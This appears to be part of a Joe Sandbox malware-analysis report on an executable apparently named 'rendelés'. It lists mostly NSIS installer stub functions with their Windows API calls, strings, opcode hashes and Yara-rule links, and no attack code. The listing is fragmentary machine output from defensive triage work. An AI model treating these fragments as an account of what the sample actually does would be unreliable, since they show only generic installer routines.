Associated: 00000002.00000002.3278886220.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3278913333.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_rendel#U00e9s_1023200000000000305.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F
API String ID: 941294808-1304234792
Opcode ID: 8da9fae8b34351ceae2931000ebd9f39a308799c7d87b7a6dbcfe72b45b7384c
Instruction ID: e2f9fea5dfd6f059ba8eeb08e8d10ac227d01a2162b8a260283931f50cd0bfbf
Opcode Fuzzy Hash: 8da9fae8b34351ceae2931000ebd9f39a308799c7d87b7a6dbcfe72b45b7384c
Instruction Fuzzy Hash: 33418B71800209EFCF058FA5DE459AF7BB9FF45315F00802AF991AA2A0C7349A55DFA4

Function 00404AB5 Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 275stringCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003FB), ref: 00404B04
SetWindowTextW.USER32(00000000,?), ref: 00404B2E
SHBrowseForFolderW.SHELL32(?), ref: 00404BDF
CoTaskMemFree.OLE32(00000000), ref: 00404BEA
lstrcmpiW.KERNEL32(00428200,00423748,00000000,?,?), ref: 00404C1C
lstrcatW.KERNEL32(?,00428200), ref: 00404C28
SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404C3A

Part of subcall function 00405CAC: GetDlgItemTextW.USER32(?,?,00000400,00404C71), ref: 00405CBF

Part of subcall function 004068EF: CharNextW.USER32(?,*?|<>/":,00000000,00000000,75923420,00437800,?,0040361B,00437800,00437800,00403923), ref: 00406952
Part of subcall function 004068EF: CharNextW.USER32(?,?,?,00000000,?,0040361B,00437800,00437800,00403923), ref: 00406961
Part of subcall function 004068EF: CharNextW.USER32(?,00000000,75923420,00437800,?,0040361B,00437800,00437800,00403923), ref: 00406966
Part of subcall function 004068EF: CharPrevW.USER32(?,?,75923420,00437800,?,0040361B,00437800,00437800,00403923), ref: 00406979

GetDiskFreeSpaceW.KERNEL32(00421718,?,?,0000040F,?,00421718,00421718,?,00000001,00421718,?,?,000003FB,?), ref: 00404CFD
MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404D18

Part of subcall function 00404E71: lstrlenW.KERNEL32(00423748,00423748,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404F12
Part of subcall function 00404E71: wsprintfW.USER32 ref: 00404F1B
Part of subcall function 00404E71: SetDlgItemTextW.USER32(?,00423748), ref: 00404F2E

Strings

H7B, xrefs: 00404BB2
A, xrefs: 00404BD8

Memory Dump Source

Source File: 00000002.00000002.3278856863.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3278841900.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3278872247.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3278886220.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3278913333.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_rendel#U00e9s_1023200000000000305.jbxd

Similarity

API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
String ID: A$H7B
API String ID: 2624150263-4206748285
Opcode ID: cafbbb3b6b33e648c9f94ba13bd1897e858c1dbc17bb594ac49896ccdcf60781
Instruction ID: 9155a42c54a3203d4d9709c494e168d8d926bd307d67cbb08bf4d9f42020e7e3
Opcode Fuzzy Hash: cafbbb3b6b33e648c9f94ba13bd1897e858c1dbc17bb594ac49896ccdcf60781
Instruction Fuzzy Hash: 94A171F1900219ABDB11EFA5CD41AAFB7B8EF84315F11843BF601B62D1D77C8A418B69

Function 004030D0 Relevance: 19.5, APIs: 5, Strings: 6, Instructions: 204memoryCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 004030E4
GetModuleFileNameW.KERNEL32(00000000,00438800,00000400), ref: 00403100

Part of subcall function 00406158: GetFileAttributesW.KERNEL32(00000003,00403113,00438800,80000000,00000003), ref: 0040615C
Part of subcall function 00406158: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 0040617E

GetFileSize.KERNEL32(00000000,00000000,00439000,00000000,00436800,00436800,00438800,00438800,80000000,00000003), ref: 00403149
GlobalAlloc.KERNEL32(00000040,?), ref: 0040328B

Strings

Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403322
Error launching installer, xrefs: 00403120
Null, xrefs: 004031C7
Error writing temporary file. Make sure your temp folder is valid., xrefs: 004032D4
Inst, xrefs: 004031B5
soft, xrefs: 004031BE

Memory Dump Source

Source File: 00000002.00000002.3278856863.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3278841900.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3278872247.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3278886220.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3278913333.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_rendel#U00e9s_1023200000000000305.jbxd

Similarity

API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
String ID: Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
API String ID: 2803837635-787788815
Opcode ID: 4cb08800c77b72374b2b0a19fee77801a5306982be649b08a3b913b7ae7a0f40
Instruction ID: 6a7077609e6cbe8902eef3654a796be60faa9129f620d49927b75729aeb44cd1
Opcode Fuzzy Hash: 4cb08800c77b72374b2b0a19fee77801a5306982be649b08a3b913b7ae7a0f40
Instruction Fuzzy Hash: 74710271A40204ABDB20DFB5DD85B9E3AACAB04315F21457FF901B72D2CB789E418B6D

Function 004066A5 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 196stringCOMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32(00428200,00000400), ref: 004067C0
GetWindowsDirectoryW.KERNEL32(00428200,00000400,00000000,00422728,?,00405701,00422728,00000000,00000000,00000000,00000000), ref: 004067D3
lstrcatW.KERNEL32(00428200,\Microsoft\Internet Explorer\Quick Launch), ref: 0040684A
lstrlenW.KERNEL32(00428200,00000000,00422728,?,00405701,00422728,00000000), ref: 004068A4

Strings

Software\Microsoft\Windows\CurrentVersion, xrefs: 0040678E
\Microsoft\Internet Explorer\Quick Launch, xrefs: 00406844

Memory Dump Source

Source File: 00000002.00000002.3278856863.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3278841900.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3278872247.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3278886220.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3278913333.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_rendel#U00e9s_1023200000000000305.jbxd

Similarity

API ID: Directory$SystemWindowslstrcatlstrlen
String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
API String ID: 4260037668-730719616
Opcode ID: 1c129aaeae4721ad32508ffaab04e099ccdaef91abef8552f1ca909acb5604ca
Instruction ID: 414c90a3e727c3679fd522760d05a71ccfd37451a898d0680c6fb4b4ce958948
Opcode Fuzzy Hash: 1c129aaeae4721ad32508ffaab04e099ccdaef91abef8552f1ca909acb5604ca
Instruction Fuzzy Hash: CD61E172A02115EBDB20AF64CD40BAA37A5EF10314F22C13EE946B62D0DB3D49A1CB5D

Function 004056CA Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72stringwindowCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405702
lstrlenW.KERNEL32(004030A8,00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405712
lstrcatW.KERNEL32(00422728,004030A8,004030A8,00422728,00000000,00000000,00000000), ref: 00405725
SetWindowTextW.USER32(00422728,00422728), ref: 00405737
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040575D
SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405777
SendMessageW.USER32(?,00001013,?,00000000), ref: 00405785

Part of subcall function 004066A5: lstrcatW.KERNEL32(00428200,\Microsoft\Internet Explorer\Quick Launch), ref: 0040684A
Part of subcall function 004066A5: lstrlenW.KERNEL32(00428200,00000000,00422728,?,00405701,00422728,00000000), ref: 004068A4

Strings

('B, xrefs: 004056EB

Memory Dump Source

Source File: 00000002.00000002.3278856863.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3278841900.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3278872247.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3278886220.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3278913333.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_rendel#U00e9s_1023200000000000305.jbxd

Similarity

API ID: MessageSendlstrlen$lstrcat$TextWindow
String ID: ('B
API String ID: 1495540970-2332581011
Opcode ID: ecaae210665ee7222a04207821391202ddee9f1067a944388ad148c6c7792cdb
Instruction ID: 7f52a71d89202be05388d2ae90ba5930d13dcc1e6093ad3ff4eaa481a322a782
Opcode Fuzzy Hash: ecaae210665ee7222a04207821391202ddee9f1067a944388ad148c6c7792cdb
Instruction Fuzzy Hash: C6217A71900518FACB119FA5DD84A8EBFB8EB45360F10857AF904B62A0D67A4A509F68

Function 0040462B Relevance: 12.1, APIs: 8, Instructions: 68COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EB), ref: 00404648
GetSysColor.USER32(00000000), ref: 00404686
SetTextColor.GDI32(?,00000000), ref: 00404692
SetBkMode.GDI32(?,?), ref: 0040469E
GetSysColor.USER32(?), ref: 004046B1
SetBkColor.GDI32(?,?), ref: 004046C1
DeleteObject.GDI32(?), ref: 004046DB
CreateBrushIndirect.GDI32(?), ref: 004046E5

Memory Dump Source

Source File: 00000002.00000002.3278856863.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3278841900.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3278872247.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3278886220.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3278913333.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_rendel#U00e9s_1023200000000000305.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
Instruction ID: e78b8cc9c8042372c9a7340b9b8aa9b23ded286a9f8ddc7240a2e2d8bd1f46c0
Opcode Fuzzy Hash: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
Instruction Fuzzy Hash: DE2197715007049FC7309F28D908B5BBBF8AF42714F008D2EE992A22E1D739D944DB58

Function 004026EC Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNEL32(?,?,?,?), ref: 00402758
MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402793
SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027B6
MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027CC

Part of subcall function 00406239: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 0040624F

SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 00402878

Strings

9, xrefs: 0040273B

Memory Dump Source

Source File: 00000002.00000002.3278856863.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3278841900.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3278872247.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3278886220.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3278913333.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_rendel#U00e9s_1023200000000000305.jbxd

Similarity

API ID: File$Pointer$ByteCharMultiWide$Read
String ID: 9
API String ID: 163830602-2366072709
Opcode ID: 8f423b3a6fac41f253a82e701da8ff5cc6babda61d7ffc9716fc01ec4a97d53e
Instruction ID: 581cf2785626502de532f206a1de9da9d9b8d20bcd24121b7f7bd1133decb9a2
Opcode Fuzzy Hash: 8f423b3a6fac41f253a82e701da8ff5cc6babda61d7ffc9716fc01ec4a97d53e
Instruction Fuzzy Hash: CE51FB75D00219AADF20EF95CA88AAEBB75FF04304F50417BE541B62D4D7B49D82CB58

Function 0040302E Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,00000000), ref: 00403049
GetTickCount.KERNEL32 ref: 00403067
wsprintfW.USER32 ref: 00403095

Part of subcall function 004056CA: lstrlenW.KERNEL32(00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405702
Part of subcall function 004056CA: lstrlenW.KERNEL32(004030A8,00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405712
Part of subcall function 004056CA: lstrcatW.KERNEL32(00422728,004030A8,004030A8,00422728,00000000,00000000,00000000), ref: 00405725
Part of subcall function 004056CA: SetWindowTextW.USER32(00422728,00422728), ref: 00405737
Part of subcall function 004056CA: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040575D
Part of subcall function 004056CA: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405777
Part of subcall function 004056CA: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405785

CreateDialogParamW.USER32(0000006F,00000000,00402F93,00000000), ref: 004030B9
ShowWindow.USER32(00000000,00000005), ref: 004030C7

Part of subcall function 00403012: MulDiv.KERNEL32(?,00000064,?), ref: 00403027

Strings

... %d%%, xrefs: 0040308F

Memory Dump Source

Source File: 00000002.00000002.3278856863.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3278841900.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3278872247.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3278886220.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3278913333.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_rendel#U00e9s_1023200000000000305.jbxd

Similarity

API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
String ID: ... %d%%
API String ID: 722711167-2449383134
Opcode ID: a65563718f57099a27635650194dd277da09fbe66beefc8d93bb4be83c5e7891
Instruction ID: 5af6bf9b0b70cf9307c1258d0e5a667b07be53d22b58a3258066d7aee54b172b
Opcode Fuzzy Hash: a65563718f57099a27635650194dd277da09fbe66beefc8d93bb4be83c5e7891
Instruction Fuzzy Hash: E8018E70553614DBC7317F60AE08A5A3EACAB00F06F54457AF841B21E9DAB84645CBAE

Function 00404F7F Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404F9A
GetMessagePos.USER32 ref: 00404FA2
ScreenToClient.USER32(?,?), ref: 00404FBC
SendMessageW.USER32(?,00001111,00000000,?), ref: 00404FCE
SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404FF4

Strings

f, xrefs: 00404FD0

Memory Dump Source

Source File: 00000002.00000002.3278856863.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3278841900.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3278872247.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3278886220.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3278913333.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_rendel#U00e9s_1023200000000000305.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
Instruction ID: ce4c7d6d39dceca23aa6ebdb29af7737867007859e7bede0b388bd4d525dd41f
Opcode Fuzzy Hash: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
Instruction Fuzzy Hash: 3C014C71940219BADB00DBA4DD85BFEBBB8AF54711F10012BBB50B61C0D6B49A058BA5

Function 004069C5 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryCOMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004069DC
wsprintfW.USER32 ref: 00406A17
LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406A2B

Strings

UXTHEME, xrefs: 004069CE
%s%S.dll, xrefs: 00406A11
\, xrefs: 004069ED

Memory Dump Source

Source File: 00000002.00000002.3278856863.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3278841900.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3278872247.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3278886220.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3278913333.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_rendel#U00e9s_1023200000000000305.jbxd

Similarity

API ID: DirectoryLibraryLoadSystemwsprintf
String ID: %s%S.dll$UXTHEME$\
API String ID: 2200240437-1946221925
Opcode ID: 63130bafcb32548bd4340548baa3f8658423137b3882cd96386db367ad08b740
Instruction ID: e2ac2e7087162e0187f8b4d6776822ec24d6e31928394cf94a41c199a4feb156
Opcode Fuzzy Hash: 63130bafcb32548bd4340548baa3f8658423137b3882cd96386db367ad08b740
Instruction Fuzzy Hash: 3AF096B154121DA7DB14AB68DD0EF9B366CAB00705F11447EA646F20E0EB7CDA68CB98

Function 00402F93 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36timeCOMMON

Download Yara Rule

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402FB1
wsprintfW.USER32 ref: 00402FE5
SetWindowTextW.USER32(?,?), ref: 00402FF5
SetDlgItemTextW.USER32(?,00000406,?), ref: 00403007

Strings

unpacking data: %d%%, xrefs: 00402FD3, 00402FE3
verifying installer: %d%%, xrefs: 00402FDA

Memory Dump Source

Source File: 00000002.00000002.3278856863.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3278841900.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3278872247.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3278886220.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3278913333.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_rendel#U00e9s_1023200000000000305.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: unpacking data: %d%%$verifying installer: %d%%
API String ID: 1451636040-1158693248
Opcode ID: b65fa6b26e28fa793ab4966251e07a6fe500b79f9b1e2f9c66e5bc42e84335f7
Instruction ID: 34ad84b97f90b05cf42cbebec4ee1aaae98efe268bf46a139428006d78f28757
Opcode Fuzzy Hash: b65fa6b26e28fa793ab4966251e07a6fe500b79f9b1e2f9c66e5bc42e84335f7
Instruction Fuzzy Hash: 25F0497050020DABEF246F60DD49BEA3B69FB00309F00803AFA05B51D0DFBD9A559F59

Function 357C8278 Relevance: 10.2, Strings: 8, Instructions: 229COMMON

Download Yara Rule

Strings

$]q, xrefs: 357C8436
$]q, xrefs: 357C837A
$]q, xrefs: 357C83C9
$]q, xrefs: 357C842A
$]q, xrefs: 357C83F4
$]q, xrefs: 357C836E
$]q, xrefs: 357C83D5
$]q, xrefs: 357C8400

Memory Dump Source

Source File: 00000002.00000002.3301552932.00000000357C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 357C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_357c0000_rendel#U00e9s_1023200000000000305.jbxd

Similarity

API ID:
String ID: $]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q
API String ID: 0-1273862796
Opcode ID: 1b136c67510ab8a41e829b8ea57123c1d4707d468828aa933efbed8b6a08878c
Instruction ID: 755dd782ec4f9138a2913a65e187945492569b51939de05f6bd0644a1a3a30e1
Opcode Fuzzy Hash: 1b136c67510ab8a41e829b8ea57123c1d4707d468828aa933efbed8b6a08878c
Instruction Fuzzy Hash: 8B915F34A00209DFEB18DF69D594BAE77F6BF44344F1085A9E402AB355DBB4DD42CB90

Function 357C49E0 Relevance: 9.2, Strings: 7, Instructions: 405COMMON

Download Yara Rule

Strings

$]q, xrefs: 357C4D1C
$]q, xrefs: 357C4EE8
$]q, xrefs: 357C4EF4
$]q, xrefs: 357C4CC2
$]q, xrefs: 357C4D28
.5uq, xrefs: 357C4A3B
$]q, xrefs: 357C4E7C

Memory Dump Source

Source File: 00000002.00000002.3301552932.00000000357C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 357C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_357c0000_rendel#U00e9s_1023200000000000305.jbxd

Similarity

API ID:
String ID: .5uq$$]q$$]q$$]q$$]q$$]q$$]q
API String ID: 0-981061697
Opcode ID: 4cbd2eedb932f27e00ded956e4f9f36b39dcf41f2bd23baa1fb61492c24c04e2
Instruction ID: 1427ffae48fe6fe51ff4402223691bc6cf52b2bacb32aa8c5e16ade325349286
Opcode Fuzzy Hash: 4cbd2eedb932f27e00ded956e4f9f36b39dcf41f2bd23baa1fb61492c24c04e2
Instruction Fuzzy Hash: 7DF12A74A00204DFDB19EFA4C594A9EB7F7FF88301F248569D406AB369CB75AC82CB40

Function 00402950 Relevance: 9.1, APIs: 6, Instructions: 91memoryfileCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029B1
GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029CD
GlobalFree.KERNEL32(?), ref: 00402A06
GlobalFree.KERNEL32(00000000), ref: 00402A19
CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A35
DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A48

Memory Dump Source

Source File: 00000002.00000002.3278856863.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3278841900.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3278872247.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3278886220.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3278913333.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_rendel#U00e9s_1023200000000000305.jbxd

Similarity

API ID: Global$AllocFree$CloseDeleteFileHandle
String ID:
API String ID: 2667972263-0
Opcode ID: 00347aaa704c41d4c46baa316378e6427cafe3832f033c65b94efe24e55f9f1d
Instruction ID: 78b93316678d616cb595922dcd62a83f4062aa2fb33f08fb70827f98fa9650ab
Opcode Fuzzy Hash: 00347aaa704c41d4c46baa316378e6427cafe3832f033c65b94efe24e55f9f1d
Instruction Fuzzy Hash: E131B171D00124BBCF216FA9CE89D9EBE79AF09364F10023AF461762E1CB794D429B58

Function 00404E71 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 84stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(00423748,00423748,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404F12
wsprintfW.USER32 ref: 00404F1B
SetDlgItemTextW.USER32(?,00423748), ref: 00404F2E

Strings

%u.%u%s%s, xrefs: 00404EFC
H7B, xrefs: 00404F04

Memory Dump Source

Source File: 00000002.00000002.3278856863.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3278841900.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3278872247.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3278886220.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3278913333.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_rendel#U00e9s_1023200000000000305.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s$H7B
API String ID: 3540041739-107966168
Opcode ID: 9c55475845004576d56970086a3160dc1853a6ea3782dd039902276dcfc99cf4
Instruction ID: 20619224473e8c08b4fba53027c62ddcf1c3fef784a2ba69f514aa474de30786
Opcode Fuzzy Hash: 9c55475845004576d56970086a3160dc1853a6ea3782dd039902276dcfc99cf4
Instruction Fuzzy Hash: 1A11D8736041283BDB00A5ADDC45E9F3298AB81338F150637FA26F61D1EA79882182E8

Function 004068EF Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 69COMMON

Download Yara Rule

APIs

CharNextW.USER32(?,*?|<>/":,00000000,00000000,75923420,00437800,?,0040361B,00437800,00437800,00403923), ref: 00406952
CharNextW.USER32(?,?,?,00000000,?,0040361B,00437800,00437800,00403923), ref: 00406961
CharNextW.USER32(?,00000000,75923420,00437800,?,0040361B,00437800,00437800,00403923), ref: 00406966
CharPrevW.USER32(?,?,75923420,00437800,?,0040361B,00437800,00437800,00403923), ref: 00406979

Strings

*?|<>/":, xrefs: 00406941

Memory Dump Source

Source File: 00000002.00000002.3278856863.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3278841900.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3278872247.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3278886220.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3278913333.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_rendel#U00e9s_1023200000000000305.jbxd

Similarity

API ID: Char$Next$Prev
String ID: *?|<>/":
API String ID: 589700163-165019052
Opcode ID: 4a25a2118415850d7bb15acf585ec7f7b5de772317bec8c7d00468289de3f440
Instruction ID: d28fb8c2eefe6f61a155ceb01790bbf8b21f4710aa7989e54d8eeb8481a577c9
Opcode Fuzzy Hash: 4a25a2118415850d7bb15acf585ec7f7b5de772317bec8c7d00468289de3f440
Instruction Fuzzy Hash: 2611089580061295DB303B18CC40BB762F8AF99B50F12403FE98A776C1E77C4C9286BD

Function 0040176F Relevance: 7.6, APIs: 5, Instructions: 145stringtimeCOMMON

Download Yara Rule

APIs

lstrcatW.KERNEL32(00000000,00000000,0040A5F8,00436000,?,?,00000031), ref: 004017B0
CompareFileTime.KERNEL32(-00000014,?,0040A5F8,0040A5F8,00000000,00000000,0040A5F8,00436000,?,?,00000031), ref: 004017D5

Part of subcall function 00406668: lstrcpynW.KERNEL32(?,?,00000400,004037B0,00429260,NSIS Error), ref: 00406675

Part of subcall function 004056CA: lstrlenW.KERNEL32(00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405702
